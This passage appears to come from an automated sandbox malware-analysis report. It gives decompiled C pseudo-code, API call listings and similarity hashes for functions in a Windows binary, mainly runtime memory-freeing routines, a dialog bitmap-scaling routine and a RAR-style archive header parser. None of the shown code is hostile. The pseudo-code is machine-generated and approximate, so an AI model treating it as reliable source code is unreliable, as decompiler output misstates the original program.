                0x00ccb805
                0x00ccb7a6
                0x00ccb806
                0x00ccb80e
                0x00ccb821
                0x00ccb834
                0x00ccb842
                0x00ccb84d
                0x00ccb852
                0x00ccb85b
                0x00ccb863
                0x00ccb864
                0x00ccb86a
                0x00ccb86d
                0x00ccb870
                0x00ccb877
                0x00ccb879
                0x00ccb87d
                0x00ccb885
                0x00ccb88c
                0x00ccb892
                0x00ccb893
                0x00ccb893
                0x00ccb89a
                0x00ccb89c
                0x00ccb8a1
                0x00ccb8a9
                0x00ccb8ae
                0x00ccb8af
                0x00ccb8af
                0x00ccb8b2
                0x00ccb8b5
                0x00ccb8b8
                0x00ccb8bb
                0x00ccb8bb
                0x00ccb8cd

                APIs
                • ___free_lconv_mon.LIBCMT ref: 00CCB7C8
                  • Part of subcall function 00CCB363: _free.LIBCMT ref: 00CCB380
                  • Part of subcall function 00CCB363: _free.LIBCMT ref: 00CCB392
                  • Part of subcall function 00CCB363: _free.LIBCMT ref: 00CCB3A4
                  • Part of subcall function 00CCB363: _free.LIBCMT ref: 00CCB3B6
                  • Part of subcall function 00CCB363: _free.LIBCMT ref: 00CCB3C8
                  • Part of subcall function 00CCB363: _free.LIBCMT ref: 00CCB3DA
                  • Part of subcall function 00CCB363: _free.LIBCMT ref: 00CCB3EC
                  • Part of subcall function 00CCB363: _free.LIBCMT ref: 00CCB3FE
                  • Part of subcall function 00CCB363: _free.LIBCMT ref: 00CCB410
                  • Part of subcall function 00CCB363: _free.LIBCMT ref: 00CCB422
                  • Part of subcall function 00CCB363: _free.LIBCMT ref: 00CCB434
                  • Part of subcall function 00CCB363: _free.LIBCMT ref: 00CCB446
                  • Part of subcall function 00CCB363: _free.LIBCMT ref: 00CCB458
                • _free.LIBCMT ref: 00CCB7BD
                  • Part of subcall function 00CC7A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00CCB4F8,?,00000000,?,00000000,?,00CCB51F,?,00000007,?,?,00CCB91C,?), ref: 00CC7A66
                  • Part of subcall function 00CC7A50: GetLastError.KERNEL32(?,?,00CCB4F8,?,00000000,?,00000000,?,00CCB51F,?,00000007,?,?,00CCB91C,?,?), ref: 00CC7A78
                • _free.LIBCMT ref: 00CCB7DF
                • _free.LIBCMT ref: 00CCB7F4
                • _free.LIBCMT ref: 00CCB7FF
                • _free.LIBCMT ref: 00CCB821
                • _free.LIBCMT ref: 00CCB834
                • _free.LIBCMT ref: 00CCB842
                • _free.LIBCMT ref: 00CCB84D
                • _free.LIBCMT ref: 00CCB885
                • _free.LIBCMT ref: 00CCB88C
                • _free.LIBCMT ref: 00CCB8A9
                • _free.LIBCMT ref: 00CCB8C1
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                • String ID:
                • API String ID: 161543041-0
                • Opcode ID: e069f6a59c6e0940d823ef1e1e23406bcfa26e9e37d876fb8a196367c6b2b236
                • Instruction ID: e4483b527de8061c2912d47af0082deb96ed24bbe9c5ca2e72c6b5168f4009e0
                • Opcode Fuzzy Hash: e069f6a59c6e0940d823ef1e1e23406bcfa26e9e37d876fb8a196367c6b2b236
                • Instruction Fuzzy Hash: 08313B31A047019FEB61AABAD846F5B73E8EF40350F14652DE46AD7191DF31EE80EB24
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CBC343, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 80windowCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00CBC343(void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4) {
				intOrPtr _v20;
				intOrPtr _v24;
				void _v28;
				short _v4124;
				void* _t10;
				struct HWND__* _t11;
				void* _t21;
				void* _t28;
				void* _t29;
				void* _t31;
				struct HWND__* _t34;
				void* _t45;

				_t45 = __fp0;
				_t29 = __edx;
				E00CBD940();
				_t10 = E00CB952A(__eflags);
				if(_t10 == 0) {
					return _t10;
				}
				_t11 = GetWindow(_a4, 5);
				_t34 = _t11;
				_t31 = 0;
				_a4 = _t34;
				if(_t34 == 0) {
					L11:
					return _t11;
				}
				while(_t31 < 0x200) {
					GetClassNameW(_t34,  &_v4124, 0x800);
					if(E00CB1410( &_v4124, L"STATIC") == 0 && (GetWindowLongW(_t34, 0xfffffff0) & 0x0000001f) == 0xe) {
						_t28 = SendMessageW(_t34, 0x173, 0, 0);
						if(_t28 != 0) {
							GetObjectW(_t28, 0x18,  &_v28);
							_t21 = E00CB958C(_v20);
							SendMessageW(_t34, 0x172, 0, E00CB975D(_t29, _t45, _t28, E00CB9549(_v24), _t21));
							DeleteObject(_t28);
						}
					}
					_t11 = GetWindow(_t34, 2);
					_t34 = _t11;
					if(_t34 != _a4) {
						_t31 = _t31 + 1;
						if(_t34 != 0) {
							continue;
						}
					}
					break;
				}
				goto L11;
			}















                0x00cbc343
                0x00cbc343
                0x00cbc34b
                0x00cbc350
                0x00cbc357
                0x00cbc42e
                0x00cbc42e
                0x00cbc364
                0x00cbc36a
                0x00cbc36c
                0x00cbc36e
                0x00cbc373
                0x00cbc429
                0x00000000
                0x00cbc42a
                0x00cbc37a
                0x00cbc393
                0x00cbc3ac
                0x00cbc3ce
                0x00cbc3d2
                0x00cbc3db
                0x00cbc3e4
                0x00cbc402
                0x00cbc409
                0x00cbc409
                0x00cbc3d2
                0x00cbc412
                0x00cbc418
                0x00cbc41d
                0x00cbc41f
                0x00cbc422
                0x00000000
                0x00000000
                0x00cbc422
                0x00000000
                0x00cbc41d
                0x00000000

                APIs
                • GetWindow.USER32(?,00000005), ref: 00CBC364
                • GetClassNameW.USER32(00000000,?,00000800), ref: 00CBC393
                  • Part of subcall function 00CB1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00CAACFE,?,?,?,00CAACAD,?,-00000002,?,00000000,?), ref: 00CB1426
                • GetWindowLongW.USER32(00000000,000000F0), ref: 00CBC3B1
                • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00CBC3C8
                • GetObjectW.GDI32(00000000,00000018,?), ref: 00CBC3DB
                  • Part of subcall function 00CB958C: GetDC.USER32(00000000), ref: 00CB9598
                  • Part of subcall function 00CB958C: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CB95A7
                  • Part of subcall function 00CB958C: ReleaseDC.USER32(00000000,00000000), ref: 00CB95B5
                  • Part of subcall function 00CB9549: GetDC.USER32(00000000), ref: 00CB9555
                  • Part of subcall function 00CB9549: GetDeviceCaps.GDI32(00000000,00000058), ref: 00CB9564
                  • Part of subcall function 00CB9549: ReleaseDC.USER32(00000000,00000000), ref: 00CB9572
                • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00CBC402
                • DeleteObject.GDI32(00000000), ref: 00CBC409
                • GetWindow.USER32(00000000,00000002), ref: 00CBC412
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
                • String ID: STATIC
                • API String ID: 1444658586-1882779555
                • Opcode ID: 7ed5c1c0cdcd845382f34b121a7d0aeafe8252057439912e095514fe05479421
                • Instruction ID: 9f7ecc07241a4867ecbf46790c4fa0561e93cf7892679d015abe45d220b496f2
                • Opcode Fuzzy Hash: 7ed5c1c0cdcd845382f34b121a7d0aeafe8252057439912e095514fe05479421
                • Instruction Fuzzy Hash: 7C21D5729812147BEB216BA4CC8AFFE776CEF05711F004122FB12BA191DB748F419AB0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CC8422, Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00CC8422(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0xcd4be0) {
					E00CC7A50(_t52);
					_t26 = _a4;
				}
				E00CC7A50( *((intOrPtr*)(_t26 + 0x3c)));
				E00CC7A50( *((intOrPtr*)(_a4 + 0x30)));
				E00CC7A50( *((intOrPtr*)(_a4 + 0x34)));
				E00CC7A50( *((intOrPtr*)(_a4 + 0x38)));
				E00CC7A50( *((intOrPtr*)(_a4 + 0x28)));
				E00CC7A50( *((intOrPtr*)(_a4 + 0x2c)));
				E00CC7A50( *((intOrPtr*)(_a4 + 0x40)));
				E00CC7A50( *((intOrPtr*)(_a4 + 0x44)));
				E00CC7A50( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E00CC82E8(5,  &_v8);
				_v8 =  &_a4;
				return E00CC8338(4,  &_v8);
			}




                0x00cc8428
                0x00cc842b
                0x00cc8433
                0x00cc8436
                0x00cc843b
                0x00cc843e
                0x00cc8442
                0x00cc844d
                0x00cc8458
                0x00cc8463
                0x00cc846e
                0x00cc8479
                0x00cc8484
                0x00cc848f
                0x00cc849d
                0x00cc84a5
                0x00cc84ae
                0x00cc84b6
                0x00cc84ca

                APIs
                • _free.LIBCMT ref: 00CC8436
                  • Part of subcall function 00CC7A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00CCB4F8,?,00000000,?,00000000,?,00CCB51F,?,00000007,?,?,00CCB91C,?), ref: 00CC7A66
                  • Part of subcall function 00CC7A50: GetLastError.KERNEL32(?,?,00CCB4F8,?,00000000,?,00000000,?,00CCB51F,?,00000007,?,?,00CCB91C,?,?), ref: 00CC7A78
                • _free.LIBCMT ref: 00CC8442
                • _free.LIBCMT ref: 00CC844D
                • _free.LIBCMT ref: 00CC8458
                • _free.LIBCMT ref: 00CC8463
                • _free.LIBCMT ref: 00CC846E
                • _free.LIBCMT ref: 00CC8479
                • _free.LIBCMT ref: 00CC8484
                • _free.LIBCMT ref: 00CC848F
                • _free.LIBCMT ref: 00CC849D
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 1477587a45d065a9f61667cb4e98f34e638de0efa1da3cf894bc5bf390db252c
                • Instruction ID: f3ae61b6860fc288e4a4e6a9966cd88a15e111205439b239465a763ea2c766ed
                • Opcode Fuzzy Hash: 1477587a45d065a9f61667cb4e98f34e638de0efa1da3cf894bc5bf390db252c
                • Instruction Fuzzy Hash: 3811A775104508FFCB41EF65C842EDE3B65EF04350B4162A9FA1A4B222DA31DB50BF80
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA200C, Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON
                Download Yara Rule
                C-Code - Quality: 93%
                			E00CA200C(intOrPtr __ecx) {
				signed int _t135;
				void* _t137;
				signed int _t139;
				unsigned int _t140;
				signed int _t144;
				signed int _t161;
				signed int _t164;
				void* _t167;
				void* _t172;
				signed int _t175;
				signed char _t178;
				signed char _t179;
				signed char _t180;
				signed int _t182;
				signed int _t185;
				signed int _t187;
				signed int _t188;
				signed char _t220;
				signed char _t232;
				signed int _t233;
				signed int _t236;
				intOrPtr _t240;
				signed int _t244;
				signed int _t246;
				signed int _t247;
				signed int _t257;
				signed int _t258;
				signed char _t262;
				signed int _t263;
				signed int _t265;
				intOrPtr _t272;
				intOrPtr _t275;
				intOrPtr _t278;
				intOrPtr _t314;
				signed int _t315;
				intOrPtr _t318;
				signed int _t322;
				void* _t323;
				void* _t324;
				void* _t326;
				void* _t327;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				intOrPtr* _t336;
				signed int _t339;
				void* _t340;
				signed int _t341;
				char* _t342;
				void* _t343;
				void* _t344;
				signed int _t348;
				signed int _t351;
				signed int _t366;

				E00CBD940();
				_t318 =  *((intOrPtr*)(_t344 + 0x20b8));
				 *((intOrPtr*)(_t344 + 0xc)) = __ecx;
				_t314 =  *((intOrPtr*)(_t318 + 0x18));
				_t135 = _t314 -  *((intOrPtr*)(_t344 + 0x20bc));
				if(_t135 <  *(_t318 + 0x1c)) {
					L104:
					return _t135;
				}
				_t315 = _t314 - _t135;
				 *(_t318 + 0x1c) = _t135;
				if(_t315 >= 2) {
					_t240 =  *((intOrPtr*)(_t344 + 0x20c4));
					while(1) {
						_t135 = E00CAC39E(_t315);
						_t244 = _t135;
						_t348 = _t315;
						if(_t348 < 0 || _t348 <= 0 && _t244 == 0) {
							break;
						}
						_t322 =  *(_t318 + 0x1c);
						_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t322;
						if(_t135 == 0) {
							break;
						}
						_t351 = _t315;
						if(_t351 > 0 || _t351 >= 0 && _t244 > _t135) {
							break;
						} else {
							_t339 = _t322 + _t244;
							 *(_t344 + 0x28) = _t339;
							_t137 = E00CAC39E(_t315);
							_t340 = _t339 -  *(_t318 + 0x1c);
							_t323 = _t137;
							_t135 = _t315;
							_t246 = 0;
							 *(_t344 + 0x24) = _t135;
							 *(_t344 + 0x20) = 0;
							if(0 < 0 || 0 <= 0 && _t340 < 0) {
								break;
							} else {
								if( *((intOrPtr*)(_t240 + 4)) == 1 && _t323 == 1 && _t135 == 0) {
									 *((char*)(_t240 + 0x1e)) = 1;
									_t232 = E00CAC39E(_t315);
									 *(_t344 + 0x1c) = _t232;
									if((_t232 & 0x00000001) != 0) {
										_t236 = E00CAC39E(_t315);
										if((_t236 | _t315) != 0) {
											asm("adc eax, edx");
											 *((intOrPtr*)(_t240 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t236;
											 *((intOrPtr*)(_t240 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
										}
										_t232 =  *(_t344 + 0x1c);
									}
									if((_t232 & 0x00000002) != 0) {
										_t233 = E00CAC39E(_t315);
										if((_t233 | _t315) != 0) {
											asm("adc eax, edx");
											 *((intOrPtr*)(_t240 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t233;
											 *((intOrPtr*)(_t240 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
										}
									}
									_t246 =  *(_t344 + 0x20);
									_t135 =  *(_t344 + 0x24);
								}
								if( *((intOrPtr*)(_t240 + 4)) == 2 ||  *((intOrPtr*)(_t240 + 4)) == 3) {
									_t366 = _t135;
									if(_t366 > 0 || _t366 >= 0 && _t323 > 7) {
										goto L102;
									} else {
										_t324 = _t323 - 1;
										if(_t324 == 0) {
											_t139 = E00CAC39E(_t315);
											__eflags = _t139;
											if(_t139 == 0) {
												_t140 = E00CAC39E(_t315);
												 *(_t240 + 0x10c1) = _t140 & 0x00000001;
												 *(_t240 + 0x10ca) = _t140 >> 0x00000001 & 0x00000001;
												_t144 = E00CAC251(_t318) & 0x000000ff;
												 *(_t240 + 0x10ec) = _t144;
												__eflags = _t144 - 0x18;
												if(_t144 > 0x18) {
													E00CA3E41(_t344 + 0x38, 0x14, L"xc%u", _t144);
													_t257 =  *(_t344 + 0x28);
													_t167 = _t344 + 0x40;
													_t344 = _t344 + 0x10;
													E00CA3DEC(_t257, _t240 + 0x28, _t167);
												}
												E00CAC300(_t318, _t240 + 0x10a1, 0x10);
												E00CAC300(_t318, _t240 + 0x10b1, 0x10);
												__eflags =  *(_t240 + 0x10c1);
												if( *(_t240 + 0x10c1) != 0) {
													_t325 = _t240 + 0x10c2;
													E00CAC300(_t318, _t240 + 0x10c2, 8);
													E00CAC300(_t318, _t344 + 0x30, 4);
													E00CAF524(_t344 + 0x58);
													E00CAF56A(_t344 + 0x60, _t240 + 0x10c2, 8);
													_push(_t344 + 0x30);
													E00CAF435(_t344 + 0x5c);
													_t161 = E00CBF3CA(_t344 + 0x34, _t344 + 0x34, 4);
													_t344 = _t344 + 0xc;
													asm("sbb al, al");
													__eflags =  *((intOrPtr*)(_t240 + 4)) - 3;
													 *(_t240 + 0x10c1) =  ~_t161 + 1;
													if( *((intOrPtr*)(_t240 + 4)) == 3) {
														_t164 = E00CBF3CA(_t325, 0xcd2398, 8);
														_t344 = _t344 + 0xc;
														__eflags = _t164;
														if(_t164 == 0) {
															 *(_t240 + 0x10c1) = _t164;
														}
													}
												}
												 *((char*)(_t240 + 0x10a0)) = 1;
												 *((intOrPtr*)(_t240 + 0x109c)) = 5;
												 *((char*)(_t240 + 0x109b)) = 1;
											} else {
												E00CA3E41(_t344 + 0x38, 0x14, L"x%u", _t139);
												_t258 =  *(_t344 + 0x28);
												_t172 = _t344 + 0x40;
												_t344 = _t344 + 0x10;
												E00CA3DEC(_t258, _t240 + 0x28, _t172);
											}
											goto L102;
										}
										_t326 = _t324 - 1;
										if(_t326 == 0) {
											_t175 = E00CAC39E(_t315);
											__eflags = _t175;
											if(_t175 != 0) {
												goto L102;
											}
											_push(0x20);
											 *((intOrPtr*)(_t240 + 0x1070)) = 3;
											_push(_t240 + 0x1074);
											L40:
											E00CAC300(_t318);
											goto L102;
										}
										_t327 = _t326 - 1;
										if(_t327 == 0) {
											__eflags = _t246;
											if(__eflags < 0) {
												goto L102;
											}
											if(__eflags > 0) {
												L65:
												_t178 = E00CAC39E(_t315);
												 *(_t344 + 0x13) = _t178;
												_t179 = _t178 & 0x00000001;
												_t262 =  *(_t344 + 0x13);
												 *(_t344 + 0x14) = _t179;
												_t315 = _t262 & 0x00000002;
												__eflags = _t315;
												 *(_t344 + 0x15) = _t315;
												if(_t315 != 0) {
													_t278 = _t318;
													__eflags = _t179;
													if(__eflags == 0) {
														E00CB0A64(_t240 + 0x1040, _t315, E00CAC2E0(_t278, __eflags), _t315);
													} else {
														E00CB0A25(_t240 + 0x1040, _t315, E00CAC29E(_t278), 0);
													}
													_t262 =  *(_t344 + 0x13);
													_t179 =  *(_t344 + 0x14);
												}
												_t263 = _t262 & 0x00000004;
												__eflags = _t263;
												 *(_t344 + 0x16) = _t263;
												if(_t263 != 0) {
													_t275 = _t318;
													__eflags = _t179;
													if(__eflags == 0) {
														E00CB0A64(_t240 + 0x1048, _t315, E00CAC2E0(_t275, __eflags), _t315);
													} else {
														E00CB0A25(_t240 + 0x1048, _t315, E00CAC29E(_t275), 0);
													}
												}
												_t180 =  *(_t344 + 0x13);
												_t265 = _t180 & 0x00000008;
												__eflags = _t265;
												 *(_t344 + 0x17) = _t265;
												if(_t265 != 0) {
													__eflags =  *(_t344 + 0x14);
													_t272 = _t318;
													if(__eflags == 0) {
														E00CB0A64(_t240 + 0x1050, _t315, E00CAC2E0(_t272, __eflags), _t315);
													} else {
														E00CB0A25(_t240 + 0x1050, _t315, E00CAC29E(_t272), 0);
													}
													_t180 =  *(_t344 + 0x13);
												}
												__eflags =  *(_t344 + 0x14);
												if( *(_t344 + 0x14) != 0) {
													__eflags = _t180 & 0x00000010;
													if((_t180 & 0x00000010) != 0) {
														__eflags =  *(_t344 + 0x15);
														if( *(_t344 + 0x15) == 0) {
															_t341 = 0x3fffffff;
															_t328 = 0x3b9aca00;
														} else {
															_t187 = E00CAC29E(_t318);
															_t341 = 0x3fffffff;
															_t328 = 0x3b9aca00;
															_t188 = _t187 & 0x3fffffff;
															__eflags = _t188 - 0x3b9aca00;
															if(_t188 < 0x3b9aca00) {
																E00CB06D0(_t240 + 0x1040, _t188, 0);
															}
														}
														__eflags =  *(_t344 + 0x16);
														if( *(_t344 + 0x16) != 0) {
															_t185 = E00CAC29E(_t318) & _t341;
															__eflags = _t185 - _t328;
															if(_t185 < _t328) {
																E00CB06D0(_t240 + 0x1048, _t185, 0);
															}
														}
														__eflags =  *(_t344 + 0x17);
														if( *(_t344 + 0x17) != 0) {
															_t182 = E00CAC29E(_t318) & _t341;
															__eflags = _t182 - _t328;
															if(_t182 < _t328) {
																E00CB06D0(_t240 + 0x1050, _t182, 0);
															}
														}
													}
												}
												goto L102;
											}
											__eflags = _t340 - 5;
											if(_t340 < 5) {
												goto L102;
											}
											goto L65;
										}
										_t329 = _t327 - 1;
										if(_t329 == 0) {
											__eflags = _t246;
											if(__eflags < 0) {
												goto L102;
											}
											if(__eflags > 0) {
												L60:
												E00CAC39E(_t315);
												__eflags = E00CAC39E(_t315);
												if(__eflags != 0) {
													 *((char*)(_t240 + 0x10f3)) = 1;
													E00CA3E41(_t344 + 0x38, 0x14, L";%u", _t203);
													_t344 = _t344 + 0x10;
													E00CAFA89(__eflags, _t240 + 0x28, _t344 + 0x30, 0x800);
												}
												goto L102;
											}
											__eflags = _t340 - 1;
											if(_t340 < 1) {
												goto L102;
											}
											goto L60;
										}
										_t330 = _t329 - 1;
										if(_t330 == 0) {
											 *((intOrPtr*)(_t240 + 0x1100)) = E00CAC39E(_t315);
											 *(_t240 + 0x2104) = E00CAC39E(_t315) & 0x00000001;
											_t331 = E00CAC39E(_t315);
											 *((char*)(_t344 + 0xc0)) = 0;
											__eflags = _t331 - 0x1fff;
											if(_t331 < 0x1fff) {
												E00CAC300(_t318, _t344 + 0xc4, _t331);
												 *((char*)(_t344 + _t331 + 0xc0)) = 0;
											}
											E00CAB9DE(_t344 + 0xc4, _t344 + 0xc4, 0x2000);
											_push(0x800);
											_push(_t240 + 0x1104);
											_push(_t344 + 0xc8);
											E00CB1094();
											goto L102;
										}
										_t332 = _t330 - 1;
										if(_t332 == 0) {
											_t220 = E00CAC39E(_t315);
											 *(_t344 + 0x1c) = _t220;
											_t342 = _t240 + 0x2108;
											 *(_t240 + 0x2106) = _t220 >> 0x00000002 & 0x00000001;
											 *(_t240 + 0x2107) = _t220 >> 0x00000003 & 0x00000001;
											 *((char*)(_t240 + 0x2208)) = 0;
											 *_t342 = 0;
											__eflags = _t220 & 0x00000001;
											if((_t220 & 0x00000001) != 0) {
												_t334 = E00CAC39E(_t315);
												__eflags = _t334 - 0xff;
												if(_t334 >= 0xff) {
													_t334 = 0xff;
												}
												E00CAC300(_t318, _t342, _t334);
												_t220 =  *(_t344 + 0x1c);
												 *((char*)(_t334 + _t342)) = 0;
											}
											__eflags = _t220 & 0x00000002;
											if((_t220 & 0x00000002) != 0) {
												_t333 = E00CAC39E(_t315);
												__eflags = _t333 - 0xff;
												if(_t333 >= 0xff) {
													_t333 = 0xff;
												}
												_t343 = _t240 + 0x2208;
												E00CAC300(_t318, _t343, _t333);
												 *((char*)(_t333 + _t343)) = 0;
											}
											__eflags =  *(_t240 + 0x2106);
											if( *(_t240 + 0x2106) != 0) {
												 *((intOrPtr*)(_t240 + 0x2308)) = E00CAC39E(_t315);
											}
											__eflags =  *(_t240 + 0x2107);
											if( *(_t240 + 0x2107) != 0) {
												 *((intOrPtr*)(_t240 + 0x230c)) = E00CAC39E(_t315);
											}
											 *((char*)(_t240 + 0x2105)) = 1;
											goto L102;
										}
										if(_t332 != 1) {
											goto L102;
										}
										if( *((intOrPtr*)(_t240 + 4)) == 3 &&  *((intOrPtr*)(_t318 + 0x18)) -  *(_t344 + 0x28) == 1) {
											_t340 = _t340 + 1;
										}
										_t336 = _t240 + 0x1028;
										E00CA1EDE(_t336, _t340);
										_push(_t340);
										_push( *_t336);
										goto L40;
									}
								} else {
									L102:
									_t247 =  *(_t344 + 0x28);
									 *(_t318 + 0x1c) = _t247;
									_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t247;
									if(_t135 >= 2) {
										continue;
									}
									break;
								}
							}
						}
					}
				}
			}





























































                0x00ca2011
                0x00ca2017
                0x00ca201e
                0x00ca2022
                0x00ca2027
                0x00ca2031
                0x00ca2688
                0x00ca268f
                0x00ca268f
                0x00ca2037
                0x00ca2039
                0x00ca203f
                0x00ca2046
                0x00ca204f
                0x00ca2051
                0x00ca2056
                0x00ca2058
                0x00ca205a
                0x00000000
                0x00000000
                0x00ca206d
                0x00ca2070
                0x00ca2072
                0x00000000
                0x00000000
                0x00ca2078
                0x00ca207a
                0x00000000
                0x00ca208a
                0x00ca208a
                0x00ca208f
                0x00ca2093
                0x00ca2098
                0x00ca209b
                0x00ca209d
                0x00ca209f
                0x00ca20a1
                0x00ca20a5
                0x00ca20a9
                0x00000000
                0x00ca20b9
                0x00ca20bd
                0x00ca20ce
                0x00ca20d2
                0x00ca20d7
                0x00ca20dd
                0x00ca20e1
                0x00ca20ea
                0x00ca2102
                0x00ca2104
                0x00ca2107
                0x00ca2107
                0x00ca210a
                0x00ca210a
                0x00ca2110
                0x00ca2114
                0x00ca211d
                0x00ca2135
                0x00ca2137
                0x00ca213a
                0x00ca213a
                0x00ca211d
                0x00ca213d
                0x00ca2141
                0x00ca2141
                0x00ca2149
                0x00ca2155
                0x00ca2157
                0x00000000
                0x00ca2168
                0x00ca2168
                0x00ca216b
                0x00ca251a
                0x00ca251f
                0x00ca2521
                0x00ca2551
                0x00ca255f
                0x00ca2567
                0x00ca2572
                0x00ca2575
                0x00ca257b
                0x00ca257e
                0x00ca258d
                0x00ca2592
                0x00ca2596
                0x00ca259a
                0x00ca25a2
                0x00ca25a2
                0x00ca25b2
                0x00ca25c2
                0x00ca25c7
                0x00ca25ce
                0x00ca25d6
                0x00ca25df
                0x00ca25ed
                0x00ca25f7
                0x00ca2604
                0x00ca260d
                0x00ca2613
                0x00ca2624
                0x00ca2629
                0x00ca262e
                0x00ca2632
                0x00ca2636
                0x00ca263c
                0x00ca2646
                0x00ca264b
                0x00ca264e
                0x00ca2650
                0x00ca2652
                0x00ca2652
                0x00ca2650
                0x00ca263c
                0x00ca2658
                0x00ca265f
                0x00ca2669
                0x00ca2523
                0x00ca2530
                0x00ca2535
                0x00ca2539
                0x00ca253d
                0x00ca2545
                0x00ca2545
                0x00000000
                0x00ca2521
                0x00ca2171
                0x00ca2174
                0x00ca24f3
                0x00ca24f8
                0x00ca24fa
                0x00000000
                0x00000000
                0x00ca2500
                0x00ca2508
                0x00ca2512
                0x00ca21c9
                0x00ca21cb
                0x00000000
                0x00ca21cb
                0x00ca217a
                0x00ca217d
                0x00ca2374
                0x00ca2376
                0x00000000
                0x00000000
                0x00ca237c
                0x00ca2387
                0x00ca2389
                0x00ca238e
                0x00ca2392
                0x00ca2394
                0x00ca239a
                0x00ca239e
                0x00ca239e
                0x00ca23a1
                0x00ca23a5
                0x00ca23a7
                0x00ca23a9
                0x00ca23ab
                0x00ca23cf
                0x00ca23ad
                0x00ca23bb
                0x00ca23bb
                0x00ca23d4
                0x00ca23d8
                0x00ca23d8
                0x00ca23dc
                0x00ca23dc
                0x00ca23df
                0x00ca23e3
                0x00ca23e5
                0x00ca23e7
                0x00ca23e9
                0x00ca240d
                0x00ca23eb
                0x00ca23f9
                0x00ca23f9
                0x00ca23e9
                0x00ca2412
                0x00ca2418
                0x00ca2418
                0x00ca241b
                0x00ca241f
                0x00ca2421
                0x00ca2426
                0x00ca2428
                0x00ca244c
                0x00ca242a
                0x00ca2438
                0x00ca2438
                0x00ca2451
                0x00ca2451
                0x00ca2455
                0x00ca245a
                0x00ca2460
                0x00ca2462
                0x00ca2468
                0x00ca246d
                0x00ca2496
                0x00ca249b
                0x00ca246f
                0x00ca2471
                0x00ca2476
                0x00ca247b
                0x00ca2480
                0x00ca2482
                0x00ca2484
                0x00ca248f
                0x00ca248f
                0x00ca2484
                0x00ca24a0
                0x00ca24a5
                0x00ca24ae
                0x00ca24b0
                0x00ca24b2
                0x00ca24bd
                0x00ca24bd
                0x00ca24b2
                0x00ca24c2
                0x00ca24c7
                0x00ca24d4
                0x00ca24d6
                0x00ca24d8
                0x00ca24e7
                0x00ca24e7
                0x00ca24d8
                0x00ca24c7
                0x00ca2462
                0x00000000
                0x00ca245a
                0x00ca237e
                0x00ca2381
                0x00000000
                0x00000000
                0x00000000
                0x00ca2381
                0x00ca2183
                0x00ca2186
                0x00ca2317
                0x00ca2319
                0x00000000
                0x00000000
                0x00ca231f
                0x00ca232a
                0x00ca232c
                0x00ca2338
                0x00ca233a
                0x00ca234a
                0x00ca2354
                0x00ca2359
                0x00ca236a
                0x00ca236a
                0x00000000
                0x00ca233a
                0x00ca2321
                0x00ca2324
                0x00000000
                0x00000000
                0x00000000
                0x00ca2324
                0x00ca218c
                0x00ca218f
                0x00ca22a2
                0x00ca22b1
